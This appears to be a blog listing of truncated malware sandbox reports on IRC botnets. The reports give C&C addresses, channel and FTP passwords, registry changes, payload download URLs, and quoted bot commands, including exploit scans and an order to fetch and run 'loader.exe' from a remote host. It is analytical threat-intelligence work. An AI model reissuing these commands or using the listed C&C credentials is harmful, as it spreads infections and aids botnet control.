Author: Pig

DarkSons.Virus.Gov

Uncategorized

Remote Host Port Number193.242.108.49 80216.45.58.150 8064.120.11.167 5900 * The data identified by the following URLs was then requested from the remote web server: o http://193.242.108.49/Dialer_Min/number.asp o http://www.sitepalace.com/w0rmreaper/NoVaC.jpeg NICK VirUs-jbqiiwehUSER VirUs “” “bud” :8Coded8VirUs..JOIN #THeRaNdOm1# VirusPRIVMSG #THeRaNdOm1# :Success.PONG :DarkSons.Virus.Gov PASS Virus Registry Modifications * The following Registry Key was created: o HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{67KLN5J0-4OPM-61WE-KKX2-457QWE23218} * TheRead more...

armageddoncheats.net

Uncategorized

Remote Host Port Number213.5.65.29 21213.5.65.29 35989213.5.65.29 80 ftp conections:USER cmin04@armageddoncheats.netUSER rmin01@armageddoncheats.netpasswd:123456 * The data identified by the following URLs was then requested from the remote web server: o http://armageddoncheats.net/1.php?p1=COMPUTERNAME_HXOR o http://armageddoncheats.net/2.php?p1=COMPUTERNAME_HXOR&p2=. o http://armageddoncheats.net/2.php?p1=COMPUTERNAME_HXOR&p2=.. o http://armageddoncheats.net/3.php?p1=COMPUTERNAME_HXOR Registry Modifications * The following Registry Keys were created: o HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_IBUFFER o HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_IBUFFER000 o HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_IBUFFER000Control o HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesIBuffer o HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesIBufferSecurity oRead more...

gandu.marcandpatrick.net

Uncategorized

Name Query Type Query Result Successful Protocol kat.jatajoo.ru DNS_TYPE_A 91.207.6.166 1 gandu.marcandpatrick.net DNS_TYPE_A 218.61.22.10 1 hot.jatajoo.ru DNS_TYPE_A 89.149.244.22 1 218.61.22.10:1544 Nick: [00_AUT_XP_5687882]Username: SP3-980Server Pass: pacodeddJoined Channel: ##f## with Password openChannel Topic for Channel ##F##: “.asc -S|.http http://rapidshare.com/files/314789063/bay|.advscan exp_sp3 35 3 0 -b -e -r|.advscan exp_sp2 35 3 0 -b -e -r|.advscan exp_sp3 15 3 0Read more...

85.17.138.130

Uncategorized

Remote Host Port Number192.168.88.2 80 85.17.138.130 81 NICK xx[USA|XP]5722214PONG :index.htmlUSER oo oo oo :bbJOIN #.ooo Registry Modifications The following Registry Keys were created:HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_MACROVISIONSHKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_MACROVISIONS000HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesMacrovisionsHKEY_CURRENT_USERSoftwareMacrovisionsThe newly created Registry Values are:[HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_MACROVISIONS000]Service = “Macrovisions”Legacy = 0x00000001ConfigFlags = 0x00000000Class = “LegacyDriver”ClassGUID = “{8ECC055D-047F-11D1-A537-0000F8753ED1}”DeviceDesc = “Macrovisions”[HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_MACROVISIONS]NextInstance = 0x00000001[HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesMacrovisions]DisplayName = “Macrovisions”ImagePath = “??%Temp%71863.sys”Type = 0x00000001Start = 0x00000003 Memory Modifications There was aRead more...

iik.for5love.ru(big ruski botnet)

Uncategorized

Host Name IP Addressdell-d3e62f7e26 10.1.12.2iik.for5love.ru 195.190.13.187ik.whytakebi.com 218.61.22.10hot.jatajoo.ru hot.jatajoo.ru 195.190.13.187Download URLshttp://195.190.13.187/hot.php (iik.for5love.ru)http://195.190.13.187/hot.php (iik.for5love.ru)http://195.190.13.187/hot.php (iik.for5love.ru) * C&C Server: 195.190.13.187:7272 * Server Password: * Username: SP3-152 * Nickname: [N00_DEU_XP_1314922]_CHAR(0x08)_ä@ * Channel: (Password: ) * Channeltopic: * C&C Server: 218.61.22.10:7272 * Server Password: * Username: SP3-686 * Nickname: [00_DEU_XP_1861146] * Channel: #nit (Password: open) * Channeltopic: :.asc -S|.http http://rapidshare.com/files/314264722/re|.advscanRead more...

trbotnet.sytes.net(irc botnet)

Uncategorized

Host Name IP Address dell-d3e62f7e26 10.1.13.2 trbotnet.sytes.net 85.153.30.14 * C&C Server: 85.153.30.14:6667 * Server Password: * Username: rciahpk * Nickname: [DEU|XP|772697] * Channel: #son (Password: botnetim) * Channeltopic: :.msn seen foto? hxxp://www.travestiniz.co.cc/images.php?id= |.msn.email hxxp://www.travestiniz.co.cc/images.php?id= |.p2p |.yims Topic By: [ Load ]

91.207.6.166(16k botnet)

Uncategorized

91.207.6.166 : 154491.207.6.166:3838 chanel=##F## Now talking in ##F##Topic On: [##F## ] [ .asc -S|.http http://rapidshare.com/files/313278869/hus|.advscan exp_sp3 35 3 0 -b -e -r|.advscan exp_sp2 35 3 0 -b -e -r|.advscan exp_sp3 15 3 0 -a -e -r|.advscan exp_sp2 15 3 0 -a -e -r|.r.getfile http://78.159.127.254/del/loader.exe C:start.exe 1 ]Topic By: [ ok ]Modes On: [ ##F## ]Read more...

ana.smo7he.net

Uncategorized

Host Name IP Addressana.smo7he.net 95.128.242.245dell-d3e62f7e26 10.1.14.2alkeichah.com alkeichah.com 72.35.84.6u1.k129129.com UDP ConnectionsRemote IP Address: 95.128.242.245 Port: 1975Send Datagram: packet(s) of size 7Send Datagram: 2 packet(s) of size 3Send Datagram: packet(s) of size 49Send Datagram: packet(s) of size 58Send Datagram: packet(s) of size 1Recv Datagram: 6329 packet(s) of size 0Recv Datagram: packet(s) of size 8Recv Datagram: 2 packet(s)Read more...

apolo.c-13.puc.ul

Uncategorized

Remote Host Port Number66.252.5.47 700072.35.84.6 80 * The data identified by the following URL was then requested from the remote web server: o http://alkeichah.com/881.exe NICK jcljatvxJOIN #usb trb50QUIT gettin new bin.NICK dpzgprmiUSER dpzgprmi * 0 :COMPUTERNAMEMODE dpzgprmi +ixUSER jcljatvx * 0 :COMPUTERNAMEMODE jcljatvx +ix Other details * The following port was open in the system:Read more...